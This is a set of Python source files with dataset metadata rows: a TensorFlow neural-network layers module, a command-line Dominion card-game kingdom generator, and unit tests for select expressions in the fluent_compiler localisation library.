"""Check whether i is tensor or initialization function or tf.Variable; return tf.Variable;
Parameters
-------
i : tensor or function or tf.Variable
Tensor or function to initialize tensor
shape : list or tuple or None
Shape of tensor to initialize
var_params : dict or None
Dictionary with additional parameters for tf.Variable, e.g. dict(trainable=True); Defaults to empty dict;
Returns
-------
: tf.Variable
Tensor or initialized tensor or tf.Variable as tf.Variable
"""
if isinstance(i, tf.Variable):
# i is already a tf.Variable -> nothing to do
return i
else:
# i is either a tensor or initializer -> turn it into a tensor with tof()
i = tof(i, shape)
# and then turn it into a tf.Variable
if var_params is None:
var_params = dict()
return tf.Variable(i, **var_params)
def dot_product(tensor_nd, tensor_2d):
"""Broadcastable version of tensorflow dot product between tensor_nd ad tensor_2d
Parameters
-------
tensor_nd : tensor
Tensor with 1, 2 or more dimensions; Dot product will be performed on last dimension and broadcasted over other
dimensions
tensor_2d : tensor
Tensor with 1 or 2 dimensions;
Returns
-------
: tensor
Tensor for dot product result
"""
# Get shape and replace unknown shapes (None) with -1
shape_nd = tensor_nd.get_shape().as_list()
shape_nd = [s if isinstance(s, int) else -1 for s in shape_nd]
shape_2d = tensor_2d.get_shape().as_list()
if len(shape_2d) > 2:
raise ValueError("tensor_2d must be a 1D or 2D tensor")
if len(shape_2d) == 1:
tensor_2d = tf.expand_dims(tensor_2d, 0)
if len(shape_nd) == 1:
shape_nd = tf.expand_dims(shape_nd, 0)
if len(shape_nd) > 2:
# collapse axes except for ones to multiply and perform matmul
dot_prod = tf.matmul(tf.reshape(tensor_nd, [-1, shape_nd[-1]]), tensor_2d)
# reshape to correct dimensions
dot_prod = tf.reshape(dot_prod, shape_nd[:-1] + shape_2d[-1:])
elif len(shape_nd) == 2:
dot_prod = tf.matmul(tensor_nd, tensor_2d)
else:
dot_prod = tf.matmul(tf.expand_dims(tensor_nd, 0), tensor_2d)
return dot_prod
def conv2d(x, W, strides=(1, 1, 1, 1), padding='SAME', dilation_rate=(1, 1), name='conv2d'):
"""Broadcastable version of tensorflow 2D convolution with weight mask, striding, zero-padding, and dilation
For dilation the tf.nn.convolution function is used. Otherwise the computation will default to the (cudnn-
supported) tf.nn.conv2d function.
Parameters
-------
x : tensor
Input tensor to be convoluted with weight mask; Shape can be [samples, x_dim, y_dim, features] or
[samples, timesteps, x_dim, y_dim, features]; Convolution is performed over last 3 dimensions;
W : tensor
Kernel to perform convolution with; Shape: [x_dim, y_dim, input_features, output_features]
padding : str or tuple of int
Padding method for image edges (see tensorflow convolution for further details); If specified as
tuple or list of integer tf.pad is used to symmetrically zero-pad the x and y dimensions of the input.
Furthermore supports TensorFlow paddings "VALID" and "SAME" in addition to "ZEROPAD" which symmetrically
zero-pads the input so output-size = input-size / stride (taking into account strides and dilation;
comparable to Caffe and Theano).
dilation_rate : tuple of int
Defaults to (1, 1) (i.e. normal 2D convolution). Use list of integers to specify multiple dilation rates;
only for spatial dimensions -> len(dilation_rate) must be 2;
Returns
-------
: tensor
Tensor for convolution result
"""
x_shape = x.get_shape().as_list()
x_shape = [s if isinstance(s, int) else -1 for s in x_shape]
W_shape = W.get_shape().as_list()
padding_x = None
padding_y = None
if padding == "ZEROPAD":
if len(x_shape) == 5:
s = strides[1:3]
i = (int(x_shape[2] / s[0]), int(x_shape[3] / s[1]))
elif len(x_shape) == 4:
s = strides[1:3]
i = (int(x_shape[1] / s[0]), int(x_shape[2] / s[1]))
else:
raise ValueError("invalid input shape")
# --
kernel_x = W_shape[0]
kernel_y = W_shape[1]
padding_x = int(np.ceil((i[0] - s[0] - i[0] + kernel_x + (kernel_x - 1) * (dilation_rate[0] - 1)) / (s[0] * 2)))
padding_y = int(np.ceil((i[1] - s[1] - i[1] + kernel_y + (kernel_y - 1) * (dilation_rate[1] - 1)) / (s[1] * 2)))
elif (isinstance(padding, list) or isinstance(padding, tuple)) and len(padding) == 2:
padding_x = padding[0]
padding_y = padding[1]
if padding_x is not None and padding_y is not None:
if len(x_shape) == 5:
pad = [[0, 0], [0, 0], [padding_x, padding_x], [padding_y, padding_y], [0, 0]]
elif len(x_shape) == 4:
pad = [[0, 0], [padding_x, padding_x], [padding_y, padding_y], [0, 0]]
# pad input with zeros
x = tf.pad(x, pad, "CONSTANT")
# set padding method for convolutions to valid to not add additional padding
padding = "VALID"
elif padding not in ("SAME", "VALID"):
raise ValueError("unsupported padding type")
if dilation_rate == (1, 1):
def conv_fct(inp):
return tf.nn.conv2d(input=inp, filter=W, padding=padding, strides=strides, name=name)
else:
if (strides[0] != 1) or (strides[-1] != 1):
raise AttributeError("Striding in combination with dilation is only possible along the spatial dimensions,"
"i.e. strides[0] and strides[-1] have to be 1.")
def conv_fct(inp):
return tf.nn.convolution(input=inp, filter=W, dilation_rate=dilation_rate,
padding=padding, strides=strides[1:3], name=name)
# Flatten matrix in first dimensions if necessary (join samples and sequence positions)
with tf.variable_scope(name):
if len(x_shape) > 4:
x_shape = [s if isinstance(s, int) else -1 for s in x.get_shape().as_list()]
if x_shape[0] == -1 or x_shape[1] == -1:
x_flat = tf.reshape(x, [-1] + x_shape[2:])
else:
x_flat = tf.reshape(x, [x_shape[0] * x_shape[1]] + x_shape[2:])
conv = conv_fct(x_flat)
conv = tf.reshape(conv, x_shape[:2] + conv.get_shape().as_list()[1:])
else:
conv = conv_fct(x)
return conv
def avgpool2D(x, ksize, strides, padding, data_format):
"""Broadcastable version of tensorflow max_pool
Parameters
-------
x : tensor
Input tensor to be convoluted with weight mask; Shape can be [samples, x_dim, y_dim, features] or
[samples, timesteps, x_dim, y_dim, features]; Convolution is performed over last 3 dimensions;
Returns
-------
: tensor
Tensor for avgpooling result
"""
x_shape = x.get_shape().as_list()
x_shape = [s if isinstance(s, int) else -1 for s in x_shape]
# Flatten matrix in first dimensions if necessary (join samples and sequence positions)
if len(x_shape) > 4:
if x_shape[0] == -1:
x_flat = tf.reshape(x, [-1] + x_shape[2:])
else:
x_flat = tf.reshape(x, [x_shape[0] * x_shape[1]] + x_shape[2:])
avgpool = tf.nn.avg_pool(x_flat, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
avgpool = tf.reshape(avgpool, x_shape[:2] + avgpool.get_shape().as_list()[1:])
else:
avgpool = tf.nn.avg_pool(x, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
return avgpool
def maxpool2D(x, ksize, strides, padding, data_format):
"""Broadcastable version of tensorflow max_pool
Parameters
-------
x : tensor
Input tensor to be convoluted with weight mask; Shape can be [samples, x_dim, y_dim, features] or
[samples, timesteps, x_dim, y_dim, features]; Convolution is performed over last 3 dimensions;
Returns
-------
: tensor
Tensor for maxpooling result
"""
x_shape = x.get_shape().as_list()
x_shape = [s if isinstance(s, int) else -1 for s in x_shape]
# Flatten matrix in first dimensions if necessary (join samples and sequence positions)
if len(x_shape) > 4:
if x_shape[0] == -1:
x_flat = tf.reshape(x, [-1] + x_shape[2:])
else:
x_flat = tf.reshape(x, [x_shape[0] * x_shape[1]] + x_shape[2:])
maxpool = tf.nn.max_pool(x_flat, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
maxpool = tf.reshape(maxpool, x_shape[:2] + maxpool.get_shape().as_list()[1:])
else:
maxpool = tf.nn.max_pool(x, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
return maxpool
def get_input(incoming):
"""Get input from Layer class or tensor
Check if input is available via get_output() function or turn tensor into lambda expressions instead; Also
try to fetch shape of incoming via get_output_shape();
Returns
-------
: tensor
Tensor with input
: list
Shape of input tensor
"""
try:
return incoming.get_output, incoming.get_output_shape()
except AttributeError:
return lambda **kwargs: incoming, [d if isinstance(d, int) else -1 for d in incoming.get_shape().as_list()]
def dropout_selu(x, rate, alpha=-1.7580993408473766, fixedPointMean=0.0, fixedPointVar=1.0,
noise_shape=None, seed=None, name=None, training=False):
"""Dropout to a value with rescaling."""
def dropout_selu_impl(x, rate, alpha, noise_shape, seed, name):
keep_prob = 1.0 - rate
x = ops.convert_to_tensor(x, name="x")
if isinstance(keep_prob, numbers.Real) and not 0 < keep_prob <= 1:
raise ValueError("keep_prob must be a scalar tensor or a float in the "
"range (0, 1], got %g" % keep_prob)
keep_prob = ops.convert_to_tensor(keep_prob, dtype=x.dtype, name="keep_prob")
keep_prob.get_shape().assert_is_compatible_with(tensor_shape.scalar())
alpha = ops.convert_to_tensor(alpha, dtype=x.dtype, name="alpha")
keep_prob.get_shape().assert_is_compatible_with(tensor_shape.scalar())
if tensor_util.constant_value(keep_prob) == 1:
return x
noise_shape = noise_shape if noise_shape is not None else array_ops.shape(x)
random_tensor = keep_prob
random_tensor += random_ops.random_uniform(noise_shape, seed=seed, dtype=x.dtype)
binary_tensor = math_ops.floor(random_tensor)
ret = x * binary_tensor + alpha * (1 - binary_tensor)
a = tf.sqrt(fixedPointVar / (keep_prob * ((1 - keep_prob) * tf.pow(alpha - fixedPointMean, 2) + fixedPointVar)))
b = fixedPointMean - a * (keep_prob * fixedPointMean + (1 - keep_prob) * alpha)
ret = a * ret + b
ret.set_shape(x.get_shape())
return ret
with ops.name_scope(name, "dropout", [x]) as name:
return utils.smart_cond(training,
lambda: dropout_selu_impl(x, rate, alpha, noise_shape, seed, name),
lambda: array_ops.identity(x))
# ------------------------------------------------------------------------------------------------------------------
# Classes
# ------------------------------------------------------------------------------------------------------------------
class Layer(object):
def __init__(self):
"""Template class for all layers
Parameters
-------
Returns
-------
Attributes
-------
.out : tensor or None
Current output of the layer (does not trigger computation)
"""
self.layer_scope = None
self.out = None
def get_output(self, **kwargs):
"""Calculate and return output of layer"""
return self.out
def get_output_shape(self):
"""Return shape of output (preferably without calculating the output)"""
return []
class DropoutLayer(Layer):
def __init__(self, incoming, prob, noise_shape=None, selu_dropout: bool = False, training: bool = True,
name='DropoutLayer'):
""" Dropout layer using tensorflow dropout
Parameters
-------
incoming : layer, tensorflow tensor, or placeholder
Incoming layer
prob : float or False
Probability to drop out an element
noise_shape : list or None
Taken from tensorflow documentation: By default, each element is kept or dropped independently. If
noise_shape is specified, it must be broadcastable to the shape of x, and only dimensions with
noise_shape[i] == shape(x)[i] will make independent decisions. For example, if shape(x) = [k, l, m, n] and
noise_shape = [k, 1, 1, n], each batch and channel component will be kept independently and each row and
column will be kept or not kept together.
If None: drop out last dimension of input tensor consistently (i.e. drop out features);
Returns
-------
"""
super(DropoutLayer, self).__init__()
with tf.variable_scope(name) as self.layer_scope:
self.incoming, self.incoming_shape = get_input(incoming)
if noise_shape is None:
noise_shape = np.append(np.ones(len(self.incoming_shape) - 1, dtype=np.int32),
[self.incoming_shape[-1]])
else:
self.noise_shape = noise_shape
self.prob = prob
self.noise_shape = noise_shape
self.out = None
self.name = name
self.selu_dropout = selu_dropout
self.training = training
def get_output_shape(self):
"""Return shape of output"""
return self.incoming_shape
def get_output(self, prev_layers=None, **kwargs):
"""Calculate and return output of layer
Parameters
-------
prev_layers : list of Layer or None
List of layers that have already been processed (i.e. whose outputs have already been (re)computed and/or
shall not be computed again)
"""
if prev_layers is None:
prev_layers = list()
if self not in prev_layers:
prev_layers += [self]
incoming = self.incoming(prev_layers=prev_layers, **kwargs)
with tf.variable_scope(self.layer_scope):
if self.prob is not False:
if self.selu_dropout:
self.out = dropout_selu(incoming, rate=self.prob, noise_shape=self.noise_shape,
training=self.training)
else:
self.out = tf.nn.dropout(incoming, keep_prob=1. - self.prob, noise_shape=self.noise_shape)
else:
self.out = incoming
return self.out
class DenseLayer(Layer):
def __init__(self, incoming, n_units, flatten_input=False, W=tf.zeros, b=tf.zeros, a=tf.sigmoid, name='DenseLayer'):
""" Dense layer, flexible enough to broadcast over time series
Parameters
-------
incoming : layer, tensorflow tensor, or placeholder
Input of shape (samples, sequence_positions, features) or (samples, features) or (samples, ..., features);
n_units : int
Number of dense layer units
flatten_input : bool
True: flatten all inputs (samples[, ...], features) to shape (samples, -1); i.e. fully connect to everything
per sample
False: flatten all inputs (samples[, sequence_positions, ...], features) to shape
(samples, sequence_positions, -1); i.e. fully connect to everything per sample or sequence position;
W : initializer or tensor or tf.Variable
Weights W either as initializer or tensor or tf.Variable; Will be used as learnable tf.Variable in any case;
b : initializer or tensor or tf.Variable or None
Biases b either as initializer or tensor or tf.Variable; Will be used as learnable tf.Variable in any case;
No bias will be applied if b=None;
a : function
Activation function
name : string
Name of individual layer; Used as tensorflow scope;
Returns
-------
"""
super(DenseLayer, self).__init__()
with tf.variable_scope(name) as self.layer_scope:
self.incoming, self.incoming_shape = get_input(incoming)
if (len(self.incoming_shape) > 2) and flatten_input:
incoming_shape = [self.incoming_shape[0], np.prod(self.incoming_shape[1:])]
elif len(self.incoming_shape) == 4:
incoming_shape = [self.incoming_shape[0], np.prod(self.incoming_shape[1:])]
elif len(self.incoming_shape) >= 5:
incoming_shape = [self.incoming_shape[0], self.incoming_shape[1], np.prod(self.incoming_shape[2:])]
else:
incoming_shape = self.incoming_shape
# Set init for W
W = tofov(W, shape=[incoming_shape[-1], n_units], var_params=dict(name='W_dense'))
# Set init for b
if b is not None:
b = tofov(b, [n_units], var_params=dict(name='b_dense'))
self.a = a
self.b = b
self.W = W
self.n_units = n_units
self.flatten_input = flatten_input
self.incoming_shape = incoming_shape
self.out = None
self.name = name
def get_output_shape(self):
"""Return shape of output"""
return [s if isinstance(s, int) and s >= 0 else -1 for s in self.incoming_shape[:-1]] + [self.n_units]
def get_output(self, prev_layers=None, **kwargs):
"""Calculate and return output of layer
Parameters
-------
prev_layers : list of Layer or None
List of layers that have already been processed (i.e. whose outputs have already been (re)computed and/or
shall not be computed again)
"""
if prev_layers is None:
prev_layers = list()
if self not in prev_layers:
prev_layers += [self]
incoming = self.incoming(prev_layers=prev_layers, **kwargs)
with tf.variable_scope(self.layer_scope):
if (len(incoming.shape) > 2 and self.flatten_input) or (len(incoming.shape) > 3):
# Flatten all but first dimension (e.g. flat seq_pos and features)
X = tf.reshape(incoming, self.incoming_shape)
else:
X = incoming
net = dot_product(X, self.W)
if self.b is not None:
net += self.b
self.out = self.a(net)
return self.out
def get_weights(self):
"""Return list with all layer weights"""
return [self.W]
def get_biases(self):
"""Return list with all layer biases"""
if self.b is None:
return []
else:
return [self.b]
class ConvLayer(Layer):
def __init__(self, incoming, W=None, b=tf.zeros, ksize: int = None, num_outputs: int = None,
weight_initializer=None, a=tf.nn.elu, strides=(1, 1, 1, 1), padding='ZEROPAD', dilation_rate=(1, 1),
name='ConvLayer'):
""" Convolutional layer, flexible enough to broadcast over timeseries
Parameters
-------
incoming : layer, tensorflow tensor, or placeholder
Input of shape (samples, sequence_positions, array_x, array_y, features) or
(samples, array_x, array_y, features);
W : tensorflow tensor or tf.Variable
Initial value for weight kernel of shape (kernel_x, kernel_y, n_input_channels, n_output_channels)
b : tensorflow initializer or tensor or tf.Variable or None
Initial values or initializers for bias; None if no bias should be applied;
ksize : int
Kernel size; only used in conjunction with num_outputs and weight_initializer
num_outputs : int
Number of output feature maps; only used in conjunction with ksize and weight_initializer
weight_initializer : initializer function
Function for initialization of weight kernels; only used in conjunction with ksize and num_outputs
a : tensorflow function
Activation functions for output
strides : tuple
Striding to use (see tensorflow convolution for further details)
padding : str or tuple of int
Padding method for image edges (see tensorflow convolution for further details); If specified as
tuple or list of integer tf.pad is used to symmetrically zero-pad the x and y dimensions of the input.
Furthermore supports TensorFlow paddings "VALID" and "SAME" in addition to "ZEROPAD" which symmetrically
zero-pads the input so output-size = input-size / stride (taking into account strides and dilation;
comparable to Caffe and Theano).
dilation_rate : tuple of int or list of int
Defaults to (1, 1) (i.e. normal 2D convolution). Use list of integers to specify multiple dilation rates;
only for spatial dimensions -> len(dilation_rate) must be 2;
Returns
-------
"""
super(ConvLayer, self).__init__()
with tf.variable_scope(name) as self.layer_scope:
self.incoming, self.incoming_shape = get_input(incoming)
# Set init for W and b
if all(p is not None for p in [weight_initializer, ksize, num_outputs]):
W = tofov(weight_initializer, shape=(ksize, ksize, self.incoming_shape[-1], num_outputs),
var_params=dict(name='W_conv'))
else:
W = tofov(W, shape=None, var_params=dict(name='W_conv'))
ksize = W.get_shape()[0].value
if b is not None:
b = tofov(b, shape=W.get_shape().as_list()[-1], var_params=dict(name='b_conv'))
self.a = a
self.b = b
self.W = W
self.padding = padding
self.strides = strides
self.dilation_rate = dilation_rate
self.out = None
self.name = name
def get_output_shape(self):
"""Return shape of output"""
weights = self.W.get_shape().as_list()
input_size = np.asarray(self.incoming_shape[-3:-1])
strides = np.asarray(self.strides[-3:-1])
kernels = np.asarray(weights[0:2])
num_output = weights[-1]
dilations = np.asarray(self.dilation_rate)
if (isinstance(self.padding, list) or isinstance(self.padding, tuple)) and len(self.padding) == 2:
output_size = np.asarray(
np.ceil((input_size + 2 * np.asarray(self.padding) - kernels - (kernels - 1) * (dilations - 1)) / strides + 1),
dtype=np.int)
else:
output_size = np.asarray(
np.ceil(input_size / strides) if self.padding == "SAME" or self.padding == "ZEROPAD" else np.ceil(
(input_size - (kernels - 1) * dilations) / strides), dtype=np.int)
output_shape = self.incoming_shape[:]
output_shape[-3:-1] = output_size.tolist()
output_shape[-1] = num_output
return output_shape
def get_output(self, prev_layers=None, **kwargs):
"""Calculate and return output of layer
Parameters
-------
prev_layers : list of Layer or None
List of layers that have already been processed (i.e. whose outputs have already been (re)computed and/or
shall not be computed again)
"""
if prev_layers is None:
prev_layers = list()
if self not in prev_layers:
prev_layers += [self]
incoming = self.incoming(prev_layers=prev_layers, **kwargs)
with tf.variable_scope(self.layer_scope):
# Perform convolution
conv = conv2d(incoming, self.W, strides=self.strides, padding=self.padding,
dilation_rate=self.dilation_rate)
# Add bias
if self.b is not None:
conv += self.b
# Apply activation function
self.out = self.a(conv)
return self.out
def get_weights(self):
"""Return list with all layer weights"""
return [self.W]
def get_biases(self):
"""Return list with all layer biases"""
if self.b is None:
return []
else:
return [self.b]
class AvgPoolingLayer(Layer):
def __init__(self, incoming, ksize=(1, 3, 3, 1), strides=(1, 1, 1, 1), padding='SAME', data_format='NHWC',
name='MaxPoolingLayer'):
"""Average-pooling layer, capable of broadcasing over timeseries
see tensorflow nn.avg_pool function for further details on parameters
Parameters
-------
incoming : layer, tensorflow tensor, or placeholder
input to layer
Returns
-------
"""
super(AvgPoolingLayer, self).__init__()
with tf.variable_scope(name) as self.layer_scope:
self.incoming, self.incoming_shape = get_input(incoming)
self.ksize = ksize
self.strides = strides
self.padding = padding
self.data_format = data_format
self.out = None
self.name = name
def get_output_shape(self):
"""Return shape of output"""
input_size = np.asarray(self.incoming_shape[-3:-1] if self.data_format == "NHWC" else self.incoming_shape[-2:])
strides = np.asarray(self.strides[-3:-1] if self.data_format == "NHWC" else self.strides[-2:])
kernels = np.asarray(self.ksize[-3:-1] if self.data_format == "NHWC" else self.ksize[-2:])
output_size = np.asarray(
np.ceil(input_size / strides) if self.padding == "SAME" else np.ceil((input_size - (kernels - 1)) / strides), dtype=np.int)
output_shape = self.incoming_shape[:]
if self.data_format == "NHWC":
output_shape[-3:-1] = output_size.tolist()
else:
output_shape[-2:] = output_size.tolist()
return output_shape
def get_output(self, prev_layers=None, **kwargs):
"""Calculate and return output of layer
Parameters
-------
prev_layers : list of Layer or None
List of layers that have already been processed (i.e. whose outputs have already been (re)computed and/or
shall not be computed again)
"""
if prev_layers is None:
prev_layers = list()
if self not in prev_layers:
prev_layers += [self]
incoming = self.incoming(prev_layers=prev_layers, **kwargs)
with tf.variable_scope(self.layer_scope):
self.out = avgpool2D(incoming, ksize=self.ksize, strides=self.strides, padding=self.padding,
data_format=self.data_format)
return self.out
class MaxPoolingLayer(Layer):
def __init__(self, incoming, ksize=(1, 3, 3, 1), strides=(1, 1, 1, 1), padding='SAME', data_format='NHWC',
name='MaxPoolingLayer'):
"""Max pooling layer, capable of broadcasting over time series
see tensorflow max pooling function for further details on parameters
Parameters
-------
incoming : layer, tensorflow tensor, or placeholder
input to layer
Returns
-------
"""
super(MaxPoolingLayer, self).__init__()
with tf.variable_scope(name) as self.layer_scope:
self.incoming, self.incoming_shape = get_input(incoming)
self.ksize = ksize
self.strides = strides
self.padding = padding
self.data_format = data_format
self.out = None
self.name = name
def get_output_shape(self):
"""Return shape of output"""
input_size = np.asarray(self.incoming_shape[-3:-1] if self.data_format == "NHWC" else self.incoming_shape[-2:])
strides = np.asarray(self.strides[-3:-1] if self.data_format == "NHWC" else self.strides[-2:])
kernels = np.asarray(self.ksize[-3:-1] if self.data_format == "NHWC" else self.ksize[-2:])
output_size = np.asarray(
np.ceil(input_size / strides) if self.padding == "SAME" else np.ceil((input_size - (kernels - 1)) / strides), dtype=np.int)
output_shape = self.incoming_shape[:]
if self.data_format == "NHWC":
output_shape[-3:-1] = output_size.tolist()
else:
output_shape[-2:] = output_size.tolist()
return output_shape
def get_output(self, prev_layers=None, **kwargs):
"""Calculate and return output of layer
Parameters
-------
prev_layers : list of Layer or None
List of layers that have already been processed (i.e. whose outputs have already been (re)computed and/or
shall not be computed again)
"""
if prev_layers is None:
prev_layers = list()
if self not in prev_layers:
prev_layers += [self]
incoming = self.incoming(prev_layers=prev_layers, **kwargs)
with tf.variable_scope(self.layer_scope):
self.out = maxpool2D(incoming, ksize=self.ksize, strides=self.strides, padding=self.padding,
data_format=self.data_format)
return self.out
class ConcatLayer(Layer):
def __init__(self, incomings, a=tf.identity, name='ConcatLayer'):
"""Concatenate outputs of multiple layers at last dimension (e.g. for skip-connections)
Parameters
-------
incomings : list of layers, tensorflow tensors, or placeholders
List of incoming layers to be concatenated
Returns
-------
"""
super(ConcatLayer, self).__init__()
with tf.variable_scope(name) as self.layer_scope:
self.incomings = []
self.incoming_shapes = []
for incoming in incomings:
incoming, incoming_shape = get_input(incoming)
self.incomings.append(incoming)
self.incoming_shapes.append(incoming_shape)
self.name = name
self.a = a
def get_output_shape(self):
"""Return shape of output"""
return self.incoming_shapes[0][:-1] + [sum([s[-1] for s in self.incoming_shapes])]
def get_output(self, prev_layers=None, **kwargs):
"""Calculate and return output of layer
Parameters
-------
prev_layers : list of Layer or None
List of layers that have already been processed (i.e. whose outputs have already been (re)computed and/or
shall not be computed again)
"""
if prev_layers is None:
prev_layers = list()
if self not in prev_layers:
prev_layers += [self]
incomings = [incoming(prev_layers=prev_layers, **kwargs) for incoming in self.incomings]
with tf.variable_scope(self.layer_scope):
self.out = self.a(tf.concat(axis=len(self.incoming_shapes[0]) - 1, values=incomings))
return self.out
| UTF-8 | Python | false | false | 34,148 | py | 127 | layers.py | 12 | 0.564706 | 0.556213 | 0 | 829 | 40.190591 | 135 |
zachoj10/kingdomgenerator | 7,670,811,621,204 | 3c998be86687e3213793479ff6e9e567055cf644 | 95a6304c63db86e7184f4fc976c63df6e2df7dd4 | /kingdomgenerator.py | 5082373181c4808ec3ef4dd74411837a24314618 | [] | no_license | https://github.com/zachoj10/kingdomgenerator | bc472c8b39c58163c49555686c982af82fadd9e2 | bbc46c9cdda52fbbcb11df819c6346a20627a735 | refs/heads/master | "2021-03-12T22:56:19.894438" | "2014-01-04T06:40:25" | "2014-01-04T06:40:25" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# coding=utf-8
import csv, random, math
cards = []
selectedCards = []
expansions = ['Dominion', 'Intrigue', 'Seaside', 'Alchemy', 'Prosperity', 'Cornucopia', 'Hinterlands', "Dark Ages", 'Guilds']
possibleCards = []
cardDispersion = []
#Import Card List From CSV File
with open('card_list.csv', 'rb') as csvfile:
cardreader = csv.reader(csvfile, delimiter=',', quotechar='"')
count = 0
for row in cardreader:
if (row[3] >= '2' or row[3] == '?') and (row[4] >= '1' or row[4] == '?'):
row.append('Village')
count += 1
elif row[4] >= '3':
row.append('Terminal Action')
count += 1
elif (row[3] >= '1' or row[3] == '?') and (row[4] >='2' or row[4] == '?'):
row.append('Lab')
count += 1
elif row[0] in ["Throne Room", "King's Court", "Procession"]:
row.append('Duplicator')
count += 1
elif row[12] > '1' or row[12] == '?':
row.append('Trasher')
count += 1
elif row[8] != '0':
row.append('Attack')
count += 1
elif row[7] != '0':
row.append('Victory')
count += 1
elif row[0].lower() in ["feast", "embargo", "island", "treasure map", "pillage"]:
row.append('One-shot')
else:
row.append('None')
count += 1
cards.append(row)
print(count)
#Determine Categories for all cards
#Categories will be in position 19
#Get Number of Players
numPlayers = int(raw_input("Enter the number of players: "))
numCards = numPlayers + 10
#Get Deck Selections From User
selectedDecks = []
for i in range(len(expansions)):
print(str(i)+ '. ' + expansions[i])
print('Please enter the numbers of the expanion packs you want to play with')
selection = raw_input()
selectedDeckNums = selection.split(',')
for i in range(len(selectedDeckNums)):
selectedDecks.append(expansions[int(selectedDeckNums[i])])
def mergeSelection():
#Merge selected decks into a single list
for deck in selectedDecks:
for card in cards:
if card[16] == deck:
possibleCards.append(card)
#Display Card in Readable Manner
def displayCard(card):
cardString = card[0] + ' (' + 'Cost: ' + card[2]
if card[3] != '0':
cardString += ', Actions: ' + card[3]
if card[4] != '0':
cardString += ', Cards: ' + card[4]
if card[12] != '0':
cardString += ', Trash: ' + card[12]
if card[13] != '0':
cardString += ', Coins: ' + card[13]
if card[14] != '0':
cardString += ', Buys: ' + card[14]
cardString += ', Type: '
if card[5] == '1':
cardString += 'Action'
elif card[6] == '1':
cardString += 'Tresure'
elif card[7] == '1':
cardString += 'Victory'
if card[8] == '1':
cardString += ', Attack'
if card[9] == '1':
cardString += ', Reaction'
if card[10] != '0':
cardString += ', Duration: ' + card[10]
if card[11] != '0':
cardString += ', Victory Points: ' + card[11]
if len(selectedDecks) > 1:
cardString += ', Expansion: ' + card[16]
cardString += ', Category: ' + card[18]
cardString += ')'
return cardString
#Print Selected Cards
def printkindgom():
for i in range(len(selectedCards)):
print(str(i) + '. ' + displayCard(selectedCards[i]))
#Select 12 Random Cards and allow the user to reshuffle the deck
def selectRandom():
reshuffle = 'y'
while reshuffle == 'y':
global selectedCards
selectedCards = []
random.shuffle(possibleCards)
for i in range(numCards):
selectedCards.append(possibleCards[i])
printkindgom()
reshuffle = raw_input('Would you like to reselect the kindgom? (y/n): ')
def saneKingdom():
usedCateories = []
reshuffle = 'y'
while reshuffle == 'y':
mergeSelection()
global selectedCards
selectedCards = []
numCardsSelected = 0
random.shuffle(possibleCards)
while(numCards > numCardsSelected):
if possibleCards[0][18] != 'None' and possibleCards[0][18] in usedCateories:
del possibleCards[0]
else:
selectedCards.append(possibleCards[0])
usedCateories.append(possibleCards[0][18])
del possibleCards[0]
numCardsSelected += 1
printkindgom()
reshuffle = raw_input('Would you like to reselect the kindgom? (y/n): ')
#Select a specified number of cards from a specified deck
def selectSepcific(numToSelect, deck):
possibleCards = []
for card in cards:
if card[16] == deck:
possibleCards.append(card)
random.shuffle(possibleCards)
for i in range(numToSelect):
selectedCards.append(possibleCards[i])
#Get Preferences for ratio of decks
print('How would you like the deck devived?\n1. Completely random from all selected decks.\n2. Certain Percentage from each selected deck.\n3. Generate a sane kingdom')
var = raw_input('Enter selction: ')
if var == '1':
mergeSelection()
selectRandom()
elif var == '2':
reshuffle = 'y'
while reshuffle == 'y':
cardDispersion = []
global selectedCards
selectedCards = []
percentageAllocated = 0
for i in range(len(selectedDecks) - 1):
cardDispersion.append(int(raw_input('Enter the pergentage to be taken from the ' + selectedDecks[i] + ' deck: ')))
percentageAllocated += cardDispersion[-1]
cardDispersion.append(100 - percentageAllocated)
numSelected = 0
print(len(cardDispersion))
for i in range(len(cardDispersion) - 1):
numToSelect = (int(cardDispersion[i]) * numCards)/100
selectSepcific(numToSelect, selectedDecks[i])
numSelected += numToSelect
selectSepcific(numCards - numSelected, selectedDecks[-1])
printkindgom()
reshuffle = raw_input('Would you like to reselect the kindgom? (y/n): ')
elif var == '3':
saneKingdom()
#Allow veto until they get down to 10 cards
while len(selectedCards) > 10:
printkindgom()
veto = raw_input("Enter the number of the card that you would like to veto: ")
del selectedCards[int(veto)]
print("\nYour Final Kingdom is:")
printkindgom()
| UTF-8 | Python | false | false | 6,435 | py | 2 | kingdomgenerator.py | 1 | 0.581428 | 0.561363 | 0 | 199 | 31.251256 | 168 |
django-ftl/fluent-compiler | 15,135,464,774,970 | c93d17453236284d485d1298c454ad4a897a4cb3 | d755aaaf905b48baf31aa90332f03c45f4c8dad3 | /tests/format/test_select_expression.py | 2fcb4a4fd1b32291b57d125b204a148ddbb417f7 | [
"Apache-2.0"
] | permissive | https://github.com/django-ftl/fluent-compiler | 36ffe0c76678e82f4f15bbccef057c8e4cd0e6bc | d8f19b47161788fbdea9822b130ef136fb839540 | refs/heads/master | "2023-08-08T04:16:52.368218" | "2023-07-21T10:37:17" | "2023-07-21T10:37:17" | 248,319,322 | 20 | 1 | NOASSERTION | false | "2023-04-18T16:14:05" | "2020-03-18T19:04:42" | "2023-03-04T02:49:47" | "2023-04-18T16:14:01" | 850 | 14 | 2 | 3 | Python | false | false | import unittest
from fluent_compiler.bundle import FluentBundle
from fluent_compiler.errors import FluentReferenceError
from ..utils import dedent_ftl
class TestSelectExpressionWithStrings(unittest.TestCase):
def test_with_a_matching_selector(self):
bundle = FluentBundle.from_string(
"en-US",
dedent_ftl(
"""
foo = { "a" ->
[a] A
*[b] B
}
"""
),
)
val, errs = bundle.format("foo", {})
self.assertEqual(val, "A")
self.assertEqual(errs, [])
def test_with_a_non_matching_selector(self):
bundle = FluentBundle.from_string(
"en-US",
dedent_ftl(
"""
foo = { "c" ->
[a] A
*[b] B
}
"""
),
)
val, errs = bundle.format("foo", {})
self.assertEqual(val, "B")
self.assertEqual(errs, [])
def test_with_a_missing_selector(self):
bundle = FluentBundle.from_string(
"en-US",
dedent_ftl(
"""
foo = { $none ->
[a] A
*[b] B
}
"""
),
)
val, errs = bundle.format("foo", {})
self.assertEqual(val, "B")
self.assertEqual(errs, [FluentReferenceError("<string>:2:9: Unknown external: none")])
